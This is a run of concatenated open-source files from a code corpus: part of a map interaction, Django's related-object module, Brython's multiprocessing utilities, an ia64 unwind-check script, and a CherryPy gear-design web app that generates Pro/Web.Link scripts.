    # Rendered in the supplemental area rather than inline with the content.
    display_mode = base.DISPLAY_MODE_SUPPLEMENTAL
    # Frontend dependencies loaded alongside this interaction.
    _dependency_ids = ['google_maps']
    # Learner answers are (latitude, longitude) coordinate pairs.
    answer_type = 'CoordTwoDim'
    # Author-configurable arguments: the map's initial centre and zoom level.
    # Latitude/longitude are range-validated floats; zoom is unvalidated.
    _customization_arg_specs = [{
        'name': 'latitude',
        'description': 'Starting center latitude (-90 to 90)',
        'schema': {
            'type': 'float',
            'validators': [{
                'id': 'is_at_least',
                'min_value': -90.0,
            }, {
                'id': 'is_at_most',
                'max_value': 90.0,
            }]
        },
        'default_value': 0.0,
    }, {
        'name': 'longitude',
        'description': 'Starting center longitude (-180 to 180)',
        'schema': {
            'type': 'float',
            'validators': [{
                'id': 'is_at_least',
                'min_value': -180.0,
            }, {
                'id': 'is_at_most',
                'max_value': 180.0,
            }]
        },
        'default_value': 0.0,
    }, {
        'name': 'zoom',
        'description': 'Starting zoom level (0 shows the entire earth)',
        'schema': {
            'type': 'float',
        },
        'default_value': 0.0,
    }]
| apache-2.0 |
yati-sagade/RyDyrect | django/db/models/related.py | 231 | 3157 | from django.utils.encoding import smart_unicode
from django.db.models.fields import BLANK_CHOICE_DASH
class BoundRelatedObject(object):
    """A RelatedObject bound to the field mappings of a particular object.

    Only the mappings registered under the relation's name are kept.
    """
    def __init__(self, related_object, field_mapping, original):
        self.relation = related_object
        self.field_mappings = field_mapping[related_object.name]

    def template_name(self):
        """Subclasses must supply the template used to render this relation."""
        raise NotImplementedError

    def __repr__(self):
        return repr(vars(self))
class RelatedObject(object):
    """Describes a reverse relation from *model* back to *parent_model*
    through *field*."""
    def __init__(self, parent_model, model, field):
        self.parent_model = parent_model
        self.model = model
        self.opts = model._meta
        self.field = field
        self.name = '%s:%s' % (self.opts.app_label, self.opts.module_name)
        self.var_name = self.opts.object_name.lower()

    def get_choices(self, include_blank=True, blank_choice=BLANK_CHOICE_DASH,
                    limit_to_currently_related=False):
        """Return (pk, label) choices for the related model, optionally
        prefixed with a blank choice, for use as SelectField choices.

        Analogue of django.db.models.fields.Field.get_choices, provided
        initially for utilisation by RelatedFilterSpec.
        """
        queryset = self.model._default_manager.all()
        if limit_to_currently_related:
            queryset = queryset.complex_filter(
                {'%s__isnull' % self.parent_model._meta.module_name: False})
        choices = [(obj._get_pk_val(), smart_unicode(obj)) for obj in queryset]
        blank = (blank_choice or []) if include_blank else []
        return blank + choices

    def get_db_prep_lookup(self, lookup_type, value, connection, prepared=False):
        """Delegate database lookup preparation to the underlying field."""
        return self.field.get_db_prep_lookup(
            lookup_type, value, connection=connection, prepared=prepared)

    def editable_fields(self):
        """Return the related model's editable fields, excluding the
        relation field itself."""
        all_fields = self.opts.fields + self.opts.many_to_many
        return [f for f in all_fields if f.editable and f != self.field]

    def __repr__(self):
        return "<RelatedObject: %s related to %s>" % (self.name, self.field.name)

    def bind(self, field_mapping, original, bound_related_object_class=BoundRelatedObject):
        """Wrap this relation in *bound_related_object_class* together with
        the given field mapping and original object."""
        return bound_related_object_class(self, field_mapping, original)

    def get_accessor_name(self):
        """Return the name of the reverse accessor for this relation.

        Defaults to the lower-cased object name (plus '_set' for
        many-valued relations) unless overridden via related_name.
        """
        rel = self.field.rel
        if not rel.multiple:
            return rel.related_name or self.opts.object_name.lower()
        # A symmetrical m2m relation on self has no reverse accessor.
        if getattr(rel, 'symmetrical', False) and self.model == self.parent_model:
            return None
        return rel.related_name or (self.opts.object_name.lower() + '_set')

    def get_cache_name(self):
        return "_%s_cache" % self.get_accessor_name()
| bsd-3-clause |
Jionglun/-w16b_test | static/Brython3.1.3-20150514-095342/Lib/multiprocessing/util.py | 696 | 9917 | #
# Module providing various facilities to other parts of the package
#
# multiprocessing/util.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
import sys
import functools
import os
import itertools
import weakref
import atexit
import threading # we want threading to install it's
# cleanup function before multiprocessing does
from subprocess import _args_from_interpreter_flags
from multiprocessing.process import current_process, active_children
__all__ = [
'sub_debug', 'debug', 'info', 'sub_warning', 'get_logger',
'log_to_stderr', 'get_temp_dir', 'register_after_fork',
'is_exiting', 'Finalize', 'ForkAwareThreadLock', 'ForkAwareLocal',
'SUBDEBUG', 'SUBWARNING',
]
#
# Logging
#
NOTSET = 0
SUBDEBUG = 5
DEBUG = 10
INFO = 20
SUBWARNING = 25
LOGGER_NAME = 'multiprocessing'
DEFAULT_LOGGING_FORMAT = '[%(levelname)s/%(processName)s] %(message)s'
_logger = None
_log_to_stderr = False
def sub_debug(msg, *args):
    """Log *msg* at the SUBDEBUG level, if the multiprocessing logger exists."""
    if not _logger:
        return
    _logger.log(SUBDEBUG, msg, *args)
def debug(msg, *args):
    """Log *msg* at DEBUG level, if the multiprocessing logger exists."""
    if not _logger:
        return
    _logger.log(DEBUG, msg, *args)
def info(msg, *args):
    """Log *msg* at INFO level, if the multiprocessing logger exists."""
    if not _logger:
        return
    _logger.log(INFO, msg, *args)
def sub_warning(msg, *args):
    """Log *msg* at the SUBWARNING level, if the multiprocessing logger exists."""
    if not _logger:
        return
    _logger.log(SUBWARNING, msg, *args)
def get_logger():
    '''
    Returns logger used by multiprocessing
    '''
    global _logger
    import logging
    # Serialize logger creation (and the atexit juggling below) with
    # logging's own module-level lock.
    logging._acquireLock()
    try:
        if not _logger:
            _logger = logging.getLogger(LOGGER_NAME)
            _logger.propagate = 0
            logging.addLevelName(SUBDEBUG, 'SUBDEBUG')
            logging.addLevelName(SUBWARNING, 'SUBWARNING')
            # XXX multiprocessing should cleanup before logging
            # Re-register _exit_function so it becomes the most recently
            # added atexit handler; handlers run LIFO, so multiprocessing's
            # cleanup then runs before logging's own shutdown handler.
            if hasattr(atexit, 'unregister'):
                atexit.unregister(_exit_function)
                atexit.register(_exit_function)
            else:
                # Older Pythons lack atexit.unregister; manipulate the
                # private handler list directly to achieve the same move.
                atexit._exithandlers.remove((_exit_function, (), {}))
                atexit._exithandlers.append((_exit_function, (), {}))
    finally:
        logging._releaseLock()
    return _logger
def log_to_stderr(level=None):
    '''
    Turn on logging and add a handler which prints to stderr
    '''
    global _log_to_stderr
    import logging
    logger = get_logger()
    stderr_handler = logging.StreamHandler()
    stderr_handler.setFormatter(logging.Formatter(DEFAULT_LOGGING_FORMAT))
    logger.addHandler(stderr_handler)
    if level:
        logger.setLevel(level)
    _log_to_stderr = True
    return _logger
#
# Function returning a temp directory which will be removed on exit
#
def get_temp_dir():
    # get name of a temp directory which will be automatically cleaned up
    if current_process()._tempdir is None:
        import shutil, tempfile
        tempdir = tempfile.mkdtemp(prefix='pymp-')
        info('created temp directory %s', tempdir)
        # Remove the directory at interpreter exit; priority -100 makes it
        # run after the ordinary (priority >= 0) finalizers executed by
        # _exit_function's first _run_finalizers(0) pass.
        Finalize(None, shutil.rmtree, args=[tempdir], exitpriority=-100)
        # Cache the path on the process object so repeated calls reuse it.
        current_process()._tempdir = tempdir
    return current_process()._tempdir
#
# Support for reinitialization of objects when bootstrapping a child process
#
_afterfork_registry = weakref.WeakValueDictionary()
_afterfork_counter = itertools.count()
def _run_after_forkers():
    """Invoke every registered after-fork callback, in registration order.

    Exceptions from individual callbacks are logged and swallowed so one
    failing callback cannot prevent the others from running.
    """
    for (index, ident, func), obj in sorted(_afterfork_registry.items()):
        try:
            func(obj)
        except Exception as e:
            info('after forker raised exception %s', e)
def register_after_fork(obj, func):
    # Arrange for func(obj) to run in a child process after fork.  The key
    # is (creation_counter, id(obj), func) so entries sort in registration
    # order; the WeakValueDictionary lets obj be garbage collected normally,
    # which silently drops the entry.
    _afterfork_registry[(next(_afterfork_counter), id(obj), func)] = obj
#
# Finalization using weakrefs
#
_finalizer_registry = {}
_finalizer_counter = itertools.count()
class Finalize(object):
    '''
    Class which supports object finalization using weakrefs

    ``callback(*args, **kwargs)`` is invoked at most once: when *obj* is
    garbage collected, when the instance is called explicitly, or at
    interpreter exit for entries created with an ``exitpriority``.
    Instances register themselves in the module-level
    ``_finalizer_registry`` keyed by ``(exitpriority, creation_index)``.
    '''
    def __init__(self, obj, callback, args=(), kwargs=None, exitpriority=None):
        assert exitpriority is None or type(exitpriority) is int
        if obj is not None:
            # The weakref's callback is this object itself, so the
            # finalizer fires as soon as obj is garbage collected.
            self._weakref = weakref.ref(obj, self)
        else:
            # With no object to watch, the finalizer only makes sense as
            # an exit handler, so an exitpriority is mandatory.
            assert exitpriority is not None
        self._callback = callback
        self._args = args
        self._kwargs = kwargs or {}
        self._key = (exitpriority, next(_finalizer_counter))
        self._pid = os.getpid()
        _finalizer_registry[self._key] = self
    def __call__(self, wr=None,
                 # Need to bind these locally because the globals can have
                 # been cleared at shutdown
                 _finalizer_registry=_finalizer_registry,
                 sub_debug=sub_debug, getpid=os.getpid):
        '''
        Run the callback unless it has already been called or cancelled
        '''
        try:
            del _finalizer_registry[self._key]
        except KeyError:
            sub_debug('finalizer no longer registered')
        else:
            if self._pid != getpid():
                # Finalizer was inherited across a fork; only the process
                # that registered it may run the callback.
                sub_debug('finalizer ignored because different process')
                res = None
            else:
                sub_debug('finalizer calling %s with args %s and kwargs %s',
                          self._callback, self._args, self._kwargs)
                res = self._callback(*self._args, **self._kwargs)
            # Drop all references so the callback and its arguments can be
            # collected and a second invocation becomes a no-op.
            self._weakref = self._callback = self._args = \
                self._kwargs = self._key = None
            return res
    def cancel(self):
        '''
        Cancel finalization of the object
        '''
        try:
            del _finalizer_registry[self._key]
        except KeyError:
            pass
        else:
            self._weakref = self._callback = self._args = \
                self._kwargs = self._key = None
    def still_active(self):
        '''
        Return whether this finalizer is still waiting to invoke callback
        '''
        return self._key in _finalizer_registry
    def __repr__(self):
        try:
            obj = self._weakref()
        except (AttributeError, TypeError):
            obj = None
        if obj is None:
            return '<Finalize object, dead>'
        x = '<Finalize object, callback=%s' % \
            getattr(self._callback, '__name__', self._callback)
        if self._args:
            x += ', args=' + str(self._args)
        if self._kwargs:
            x += ', kwargs=' + str(self._kwargs)
        if self._key[0] is not None:
            # Bug fix: this previously rendered as the misspelled
            # 'exitprority' (typo also fixed upstream in CPython).
            x += ', exitpriority=' + str(self._key[0])
        return x + '>'
def _run_finalizers(minpriority=None):
    '''
    Run all finalizers whose exit priority is not None and at least minpriority

    Finalizers with highest priority are called first; finalizers with
    the same priority will be called in reverse order of creation.
    '''
    if _finalizer_registry is None:
        # This function may be called after this module's globals are
        # destroyed. See the _exit_function function in this module for more
        # notes.
        return
    if minpriority is None:
        f = lambda p : p[0][0] is not None
    else:
        f = lambda p : p[0][0] is not None and p[0][0] >= minpriority
    # Snapshot the registry first: running a finalizer removes its entry
    # (and may remove others), which would break direct iteration.
    items = [x for x in list(_finalizer_registry.items()) if f(x)]
    # Keys are (exitpriority, creation_counter), so a reverse sort yields
    # highest priority first and, within a priority, newest first.
    items.sort(reverse=True)
    for key, finalizer in items:
        sub_debug('calling %s', finalizer)
        try:
            finalizer()
        except Exception:
            import traceback
            traceback.print_exc()
    if minpriority is None:
        _finalizer_registry.clear()
#
# Clean up on exit
#
def is_exiting():
    '''
    Returns true if the process is shutting down
    '''
    # _exiting is None only after module globals have been torn down,
    # which also counts as "shutting down".
    return True if _exiting is None else _exiting
_exiting = False
def _exit_function(info=info, debug=debug, _run_finalizers=_run_finalizers,
                   active_children=active_children,
                   current_process=current_process):
    # atexit handler: run priority >= 0 finalizers, terminate daemonic
    # children, join the remaining children, then run all leftover
    # finalizers (including negative-priority ones such as temp-dir cleanup).
    # We hold on to references to functions in the arglist due to the
    # situation described below, where this function is called after this
    # module's globals are destroyed.
    global _exiting
    if not _exiting:
        # Guard so the shutdown sequence runs at most once, even if the
        # handler is registered (or invoked) more than once.
        _exiting = True
        info('process shutting down')
        debug('running all "atexit" finalizers with priority >= 0')
        _run_finalizers(0)
        if current_process() is not None:
            # We check if the current process is None here because if
            # it's None, any call to ``active_children()`` will raise
            # an AttributeError (active_children winds up trying to
            # get attributes from util._current_process). One
            # situation where this can happen is if someone has
            # manipulated sys.modules, causing this module to be
            # garbage collected. The destructor for the module type
            # then replaces all values in the module dict with None.
            # For instance, after setuptools runs a test it replaces
            # sys.modules with a copy created earlier. See issues
            # #9775 and #15881. Also related: #4106, #9205, and
            # #9207.
            for p in active_children():
                if p._daemonic:
                    info('calling terminate() for daemon %s', p.name)
                    p._popen.terminate()
            for p in active_children():
                info('calling join() for process %s', p.name)
                p.join()
        debug('running the remaining "atexit" finalizers')
        _run_finalizers()
atexit.register(_exit_function)
#
# Some fork aware types
#
class ForkAwareThreadLock(object):
    """A lock that is replaced by a fresh, unlocked one in forked children.

    Prevents a child process from inheriting a lock that was held at fork
    time and would therefore deadlock.
    """
    def __init__(self):
        self._reset()
        register_after_fork(self, ForkAwareThreadLock._reset)
    def _reset(self):
        # Recreate the underlying lock and re-export its bound methods.
        fresh_lock = threading.Lock()
        self._lock = fresh_lock
        self.acquire = fresh_lock.acquire
        self.release = fresh_lock.release
class ForkAwareLocal(threading.local):
    """Thread-local storage that is wiped in forked child processes."""
    def __init__(self):
        register_after_fork(self, lambda obj: obj.__dict__.clear())
    def __reduce__(self):
        # Pickle as a fresh, empty instance rather than carrying state over.
        return type(self), ()
| agpl-3.0 |
andrewz1/kernel.tf300tg | arch/ia64/scripts/unwcheck.py | 13143 | 1714 | #!/usr/bin/python
#
# Usage: unwcheck.py FILE
#
# This script checks the unwind info of each function in file FILE
# and verifies that the sum of the region-lengths matches the total
# length of the function.
#
# Based on a shell/awk script originally written by Harish Patil,
# which was converted to Perl by Matthew Chapman, which was converted
# to Python by David Mosberger.
#
import os
import re
import sys
if len(sys.argv) != 2:
    print "Usage: %s FILE" % sys.argv[0]
    sys.exit(2)
# The readelf binary can be overridden via the READELF environment variable.
readelf = os.getenv("READELF", "readelf")
# Header line of a function's unwind table: "<name>: [0xstart-0xend]".
start_pattern = re.compile("<([^>]*)>: \[0x([0-9a-f]+)-0x([0-9a-f]+)\]")
# Region-length annotation inside a table: "... rlen=N".
rlen_pattern = re.compile(".*rlen=([0-9]+)")
def check_func (func, slots, rlen_sum):
    # Verify that the summed region lengths equal the function's slot
    # count; on mismatch, count and report the error.
    if slots != rlen_sum:
        global num_errors
        num_errors += 1
        # NOTE(review): falls back to the globals `start`/`end` assigned in
        # the main loop when the function has no name; on the very first
        # header they are unset, but func is then False-but-unnamed only
        # after at least one header has been seen -- confirm.
        if not func: func = "[%#x-%#x]" % (start, end)
        print "ERROR: %s: %lu slots, total region length = %lu" % (func, slots, rlen_sum)
    return
num_funcs = 0
num_errors = 0
func = False
slots = 0
rlen_sum = 0
# Walk `readelf -u` output, accumulating rlen values per function and
# validating each function when the next header line appears.
for line in os.popen("%s -u %s" % (readelf, sys.argv[1])):
    m = start_pattern.match(line)
    if m:
        # New function header: first validate the previous function.
        check_func(func, slots, rlen_sum)
        func = m.group(1)
        start = long(m.group(2), 16)
        end = long(m.group(3), 16)
        # ia64 packs 3 instruction slots into each 16-byte bundle.
        slots = 3 * (end - start) / 16
        rlen_sum = 0L
        num_funcs += 1
    else:
        m = rlen_pattern.match(line)
        if m:
            rlen_sum += long(m.group(1))
# Validate the final function, then report the totals.
check_func(func, slots, rlen_sum)
if num_errors == 0:
    print "No errors detected in %u functions." % num_funcs
else:
    if num_errors > 1:
        err="errors"
    else:
        err="error"
    print "%u %s detected in %u functions." % (num_errors, err, num_funcs)
    sys.exit(1)
| gpl-2.0 |
40223222/40223222 | gear.py | 204 | 19237 | #@+leo-ver=5-thin
#@+node:office.20150407074720.1: * @file gear.py
#@@language python
#@@tabwidth -4
#@+<<declarations>>
#@+node:office.20150407074720.2: ** <<declarations>> (application)
#@@language python
import cherrypy
import os
import sys
# 這個程式要計算正齒輪的齒面寬, 資料庫連結希望使用 pybean 與 SQLite
# 導入 pybean 模組與所要使用的 Store 及 SQLiteWriter 方法
from pybean import Store, SQLiteWriter
import math
# 確定程式檔案所在目錄, 在 Windows 有最後的反斜線
_curdir = os.path.join(os.getcwd(), os.path.dirname(__file__))
# 將所在目錄設為系統搜尋目錄
sys.path.append(_curdir)
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
# while program is executed in OpenShift
download_root_dir = os.environ['OPENSHIFT_DATA_DIR']
data_dir = os.environ['OPENSHIFT_DATA_DIR']
else:
# while program is executed in localhost
download_root_dir = _curdir + "/local_data/"
data_dir = _curdir + "/local_data/"
# 這是 Gear 設計資料表的定義
'''
lewis.db 中有兩個資料表, steel 與 lewis
CREATE TABLE steel (
serialno INTEGER,
unsno TEXT,
aisino TEXT,
treatment TEXT,
yield_str INTEGER,
tensile_str INTEGER,
stretch_ratio INTEGER,
sectional_shr INTEGER,
brinell INTEGER
);
CREATE TABLE lewis (
serialno INTEGER PRIMARY KEY
NOT NULL,
gearno INTEGER,
type1 NUMERIC,
type4 NUMERIC,
type3 NUMERIC,
type2 NUMERIC
);
'''
#@-<<declarations>>
#@+others
#@+node:office.20150407074720.3: ** class Gear
class Gear(object):
    """CherryPy handler that sizes a spur gear's face width.

    Reads material strengths (``steel`` table) and Lewis form factors
    (``lewis`` table) from lewis.db, then iterates diametral pitches until
    the face width lies between 3 and 5 circular pitches.
    """
    #@+others
    #@+node:office.20150407074720.4: *3* __init__
    def __init__(self):
        """Create the downloads/images/tmp directories under the data dir."""
        # NOTE(review): the bare excepts below hide the real failure reason;
        # at minimum the exception should be logged.
        # hope to create downloads and images directories
        if not os.path.isdir(download_root_dir+"downloads"):
            try:
                os.makedirs(download_root_dir+"downloads")
            except:
                print("mkdir error")
        if not os.path.isdir(download_root_dir+"images"):
            try:
                os.makedirs(download_root_dir+"images")
            except:
                print("mkdir error")
        if not os.path.isdir(download_root_dir+"tmp"):
            try:
                os.makedirs(download_root_dir+"tmp")
            except:
                print("mkdir error")
    #@+node:office.20150407074720.5: *3* default
    @cherrypy.expose
    def default(self, attr='default', *args, **kwargs):
        """Catch-all page handler: bounce every unknown URL to the root."""
        raise cherrypy.HTTPRedirect("/")
    #@+node:office.20150407074720.6: *3* index
    # 各組利用 index 引導隨後的程式執行
    @cherrypy.expose
    def index(self, *args, **kwargs):
        """Render the design-input form, listing materials from lewis.db."""
        # 進行資料庫檔案連結, 並且取出所有資料
        try:
            # 利用 Store 建立資料庫檔案對應物件, 並且設定 frozen=True 表示不要開放動態資料表的建立
            # 因為程式以 application 所在目錄執行, 因此利用相對目錄連結 lewis.db 資料庫檔案
            SQLite連結 = Store(SQLiteWriter(_curdir+"/lewis.db", frozen=True))
            #material = SQLite連結.find_one("steel","serialno = ?",[序號])
            # str(SQLite連結.count("steel")) 將傳回 70, 表示資料庫中有 70 筆資料
            material = SQLite連結.find("steel")
            # 所傳回的 material 為 iterator
            '''
            outstring = ""
            for material_item in material:
                outstring += str(material_item.serialno) + ":" + material_item.unsno + "_" + material_item.treatment + "<br />"
            return outstring
            '''
        except:
            return "抱歉! 資料庫無法連線<br />"
        outstring = '''
        <form id=entry method=post action="gear_width">
        請填妥下列參數,以完成適當的齒尺寸大小設計。<br />
        馬達馬力:<input type=text name=horsepower id=horsepower value=100 size=10>horse power<br />
        馬達轉速:<input type=text name=rpm id=rpm value=1120 size=10>rpm<br />
        齒輪減速比: <input type=text name=ratio id=ratio value=4 size=10><br />
        齒形:<select name=toothtype id=toothtype>
        <option value=type1>壓力角20度,a=0.8,b=1.0
        <option value=type2>壓力角20度,a=1.0,b=1.25
        <option value=type3>壓力角25度,a=1.0,b=1.25
        <option value=type4>壓力角25度,a=1.0,b=1.35
        </select><br />
        安全係數:<input type=text name=safetyfactor id=safetyfactor value=3 size=10><br />
        齒輪材質:<select name=material_serialno id=material_serialno>
        '''
        for material_item in material:
            outstring += "<option value=" + str(material_item.serialno) + ">UNS - " + \
                material_item.unsno + " - " + material_item.treatment
        outstring += "</select><br />"
        outstring += "小齒輪齒數:<input type=text name=npinion id=npinion value=18 size=10><br />"
        outstring += "<input type=submit id=submit value=進行運算>"
        outstring += "</form>"
        return outstring
    #@+node:office.20150407074720.7: *3* interpolation
    @cherrypy.expose
    def interpolation(self, small_gear_no=18, gear_type=1):
        """Linearly interpolate the Lewis form factor for a tooth count with
        no exact row in the ``lewis`` table.

        NOTE(review): the result is returned as a *string* via str();
        gear_width later divides by this value, which would raise
        TypeError -- confirm and convert to float at the call site.
        """
        SQLite連結 = Store(SQLiteWriter(_curdir+"/lewis.db", frozen=True))
        # 使用內插法求值
        # 找出比目標齒數大的其中的最小的,就是最鄰近的大值
        lewis_factor = SQLite連結.find_one("lewis","gearno > ?",[small_gear_no])
        if(gear_type == 1):
            larger_formfactor = lewis_factor.type1
        elif(gear_type == 2):
            larger_formfactor = lewis_factor.type2
        elif(gear_type == 3):
            larger_formfactor = lewis_factor.type3
        else:
            larger_formfactor = lewis_factor.type4
        larger_toothnumber = lewis_factor.gearno
        # 找出比目標齒數小的其中的最大的,就是最鄰近的小值
        lewis_factor = SQLite連結.find_one("lewis","gearno < ? order by gearno DESC",[small_gear_no])
        if(gear_type == 1):
            smaller_formfactor = lewis_factor.type1
        elif(gear_type == 2):
            smaller_formfactor = lewis_factor.type2
        elif(gear_type == 3):
            smaller_formfactor = lewis_factor.type3
        else:
            smaller_formfactor = lewis_factor.type4
        smaller_toothnumber = lewis_factor.gearno
        calculated_factor = larger_formfactor + (small_gear_no - larger_toothnumber) * (larger_formfactor - smaller_formfactor) / (larger_toothnumber - smaller_toothnumber)
        # 只傳回小數點後五位數
        return str(round(calculated_factor, 5))
    #@+node:office.20150407074720.8: *3* gear_width
    # 改寫為齒面寬的設計函式
    @cherrypy.expose
    def gear_width(self, horsepower=100, rpm=1000, ratio=4, toothtype=1, safetyfactor=2, material_serialno=1, npinion=18):
        """Compute a usable face width for the requested drive and material.

        NOTE(review): the index form posts ``toothtype`` as a string such
        as "type1", so the integer comparisons below never match and the
        pressure-angle branch always falls through to 25 degrees -- verify
        against the intended form values.
        """
        SQLite連結 = Store(SQLiteWriter(_curdir+"/lewis.db", frozen=True))
        outstring = ""
        # 根據所選用的齒形決定壓力角
        if(toothtype == 1 or toothtype == 2):
            壓力角 = 20
        else:
            壓力角 = 25
        # 根據壓力角決定最小齒數
        if(壓力角== 20):
            最小齒數 = 18
        else:
            最小齒數 = 12
        # 直接設最小齒數
        if int(npinion) <= 最小齒數:
            npinion = 最小齒數
        # 大於400的齒數則視為齒條(Rack)
        if int(npinion) >= 400:
            npinion = 400
        # 根據所選用的材料查詢強度值
        # 由 material之序號查 steel 表以得材料之降伏強度S單位為 kpsi 因此查得的值要成乘上1000
        # 利用 Store 建立資料庫檔案對應物件, 並且設定 frozen=True 表示不要開放動態資料表的建立
        #SQLite連結 = Store(SQLiteWriter("lewis.db", frozen=True))
        # 指定 steel 資料表
        steel = SQLite連結.new("steel")
        # 資料查詢
        #material = SQLite連結.find_one("steel","unsno=? and treatment=?",[unsno, treatment])
        material = SQLite連結.find_one("steel","serialno=?",[material_serialno])
        # 列出 steel 資料表中的資料筆數
        #print(SQLite連結.count("steel"))
        #print (material.yield_str)
        strengthstress = material.yield_str*1000
        # 由小齒輪的齒數與齒形類別,查詢lewis form factor
        # 先查驗是否有直接對應值
        on_table = SQLite連結.count("lewis","gearno=?",[npinion])
        if on_table == 1:
            # 直接進入設計運算
            #print("直接運算")
            #print(on_table)
            lewis_factor = SQLite連結.find_one("lewis","gearno=?",[npinion])
            #print(lewis_factor.type1)
            # 根據齒形查出 formfactor 值
            if(toothtype == 1):
                formfactor = lewis_factor.type1
            elif(toothtype == 2):
                formfactor = lewis_factor.type2
            elif(toothtype == 3):
                formfactor = lewis_factor.type3
            else:
                formfactor = lewis_factor.type4
        else:
            # 沒有直接對應值, 必須進行查表內插運算後, 再執行設計運算
            #print("必須內插")
            #print(interpolation(npinion, gear_type))
            # NOTE(review): interpolation() returns a string -- see its
            # docstring; the division below would then fail.
            formfactor = self.interpolation(npinion, toothtype)
        # 開始進行設計運算
        ngear = int(npinion) * int(ratio)
        # 重要的最佳化設計---儘量用整數的diametralpitch
        # 先嘗試用整數算若 diametralpitch 找到100 仍無所獲則改用 0.25 作為增量再不行則宣告 fail
        counter = 0
        i = 0.1
        facewidth = 0
        circularpitch = 0
        # Iterate diametral pitch until facewidth falls between 3 and 5
        # circular pitches (the usual design rule), or 5000 tries elapse.
        while (facewidth <= 3 * circularpitch or facewidth >= 5 * circularpitch):
            diametralpitch = i
            #circularpitch = 3.14159/diametralpitch
            circularpitch = math.pi/diametralpitch
            pitchdiameter = int(npinion)/diametralpitch
            #pitchlinevelocity = 3.14159*pitchdiameter*rpm/12
            pitchlinevelocity = math.pi*pitchdiameter * float(rpm)/12
            transmittedload = 33000*float(horsepower)/pitchlinevelocity
            velocityfactor = 1200/(1200 + pitchlinevelocity)
            # formfactor is Lewis form factor
            # formfactor need to get from table 13-3 and determined ty teeth number and type of tooth
            # formfactor = 0.293
            # 90 is the value get from table corresponding to material type
            facewidth = transmittedload*diametralpitch*float(safetyfactor)/velocityfactor/formfactor/strengthstress
            if(counter>5000):
                outstring += "超過5000次的設計運算,仍無法找到答案!<br />"
                outstring += "可能所選用的傳遞功率過大,或無足夠強度的材料可以使用!<br />"
                # 離開while迴圈
                break
            i += 0.1
            counter += 1
        facewidth = round(facewidth, 4)
        if(counter<5000):
            # 先載入 cube 程式測試
            #outstring = self.cube_weblink()
            # 再載入 gear 程式測試
            outstring = self.gear_weblink()
            outstring += "進行"+str(counter)+"次重複運算後,得到合用的facewidth值為:"+str(facewidth)
        return outstring
    #@+node:office.20150407074720.9: *3* cube_weblink
    @cherrypy.expose
    def cube_weblink(self):
        """Return an HTML/Pro-Web.Link page that opens cube.prt, sweeps its
        two dimensions, regenerates the model and saves each variant."""
        outstring = '''<script type="text/javascript" src="/static/weblink/pfcUtils.js"></script>
<script type="text/javascript" src="/static/weblink/wl_header.js">
document.writeln ("Error loading Pro/Web.Link header!");
</script>
<script type="text/javascript" language="JavaScript">
// 若第三輸入為 false, 表示僅載入 session, 但是不顯示
// ret 為 model open return
var ret = document.pwl.pwlMdlOpen("cube.prt", "v:/tmp", false);
if (!ret.Status) {
alert("pwlMdlOpen failed (" + ret.ErrorCode + ")");
}
//將 ProE 執行階段設為變數 session
var session = pfcGetProESession();
// 在視窗中打開零件檔案, 並且顯示出來
var window = session.OpenFile(pfcCreate("pfcModelDescriptor").CreateFromFileName("cube.prt"));
var solid = session.GetModel("cube.prt",pfcCreate("pfcModelType").MDL_PART);
var length,width,myf,myn,i,j,volume,count,d1Value,d2Value;
// 將模型檔中的 length 變數設為 javascript 中的 length 變數
length = solid.GetParam("a1");
// 將模型檔中的 width 變數設為 javascript 中的 width 變數
width = solid.GetParam("a2");
//改變零件尺寸
//myf=20;
//myn=20;
volume=0;
count=0;
try
{
// 以下採用 URL 輸入對應變數
//createParametersFromArguments ();
// 以下則直接利用 javascript 程式改變零件參數
for(i=0;i<=5;i++)
{
//for(j=0;j<=2;j++)
//{
myf=20.0;
myn=10.0+i*0.5;
// 設定變數值, 利用 ModelItem 中的 CreateDoubleParamValue 轉換成 Pro/Web.Link 所需要的浮點數值
d1Value = pfcCreate ("MpfcModelItem").CreateDoubleParamValue(myf);
d2Value = pfcCreate ("MpfcModelItem").CreateDoubleParamValue(myn);
// 將處理好的變數值, 指定給對應的零件變數
length.Value = d1Value;
width.Value = d2Value;
//零件尺寸重新設定後, 呼叫 Regenerate 更新模型
solid.Regenerate(void null);
//利用 GetMassProperty 取得模型的質量相關物件
properties = solid.GetMassProperty(void null);
//volume = volume + properties.Volume;
volume = properties.Volume;
count = count + 1;
alert("執行第"+count+"次,零件總體積:"+volume);
// 將零件存為新檔案
var newfile = document.pwl.pwlMdlSaveAs("cube.prt", "v:/tmp", "cube"+count+".prt");
if (!newfile.Status) {
alert("pwlMdlSaveAs failed (" + newfile.ErrorCode + ")");
}
//} // 內圈 for 迴圈
} //外圈 for 迴圈
//alert("共執行:"+count+"次,零件總體積:"+volume);
//alert("零件體積:"+properties.Volume);
//alert("零件體積取整數:"+Math.round(properties.Volume));
}
catch(err)
{
alert ("Exception occurred: "+pfcGetExceptionType (err));
}
</script>
        '''
        return outstring
    #@+node:office.20150407074720.10: *3* gear_weblink
    @cherrypy.expose
    def gear_weblink(self, facewidth=5, n=18):
        """Return an HTML/Pro-Web.Link page that opens gear.prt, sweeps the
        tooth count and face width, regenerates and saves each variant.

        NOTE(review): the ``facewidth``/``n`` parameters are not used in the
        generated script -- the JavaScript hard-codes its own sweep values.
        """
        outstring = '''<script type="text/javascript" src="/static/weblink/pfcUtils.js"></script>
<script type="text/javascript" src="/static/weblink/wl_header.js">// <![CDATA[
document.writeln ("Error loading Pro/Web.Link header!");
// ]]></script>
<script type="text/javascript" language="JavaScript">// <![CDATA[
if (!pfcIsWindows()) netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
// 若第三輸入為 false, 表示僅載入 session, 但是不顯示
// ret 為 model open return
var ret = document.pwl.pwlMdlOpen("gear.prt", "v:/", false);
if (!ret.Status) {
alert("pwlMdlOpen failed (" + ret.ErrorCode + ")");
}
//將 ProE 執行階段設為變數 session
var session = pfcGetProESession();
// 在視窗中打開零件檔案, 並且顯示出來
var window = session.OpenFile(pfcCreate("pfcModelDescriptor").CreateFromFileName("gear.prt"));
var solid = session.GetModel("gear.prt",pfcCreate("pfcModelType").MDL_PART);
var length,width,myf,myn,i,j,volume,count,d1Value,d2Value;
// 將模型檔中的 length 變數設為 javascript 中的 length 變數
length = solid.GetParam("n");
// 將模型檔中的 width 變數設為 javascript 中的 width 變數
width = solid.GetParam("face_width");
//改變零件尺寸
//myf=20;
//myn=20;
volume=0;
count=0;
try
{
// 以下採用 URL 輸入對應變數
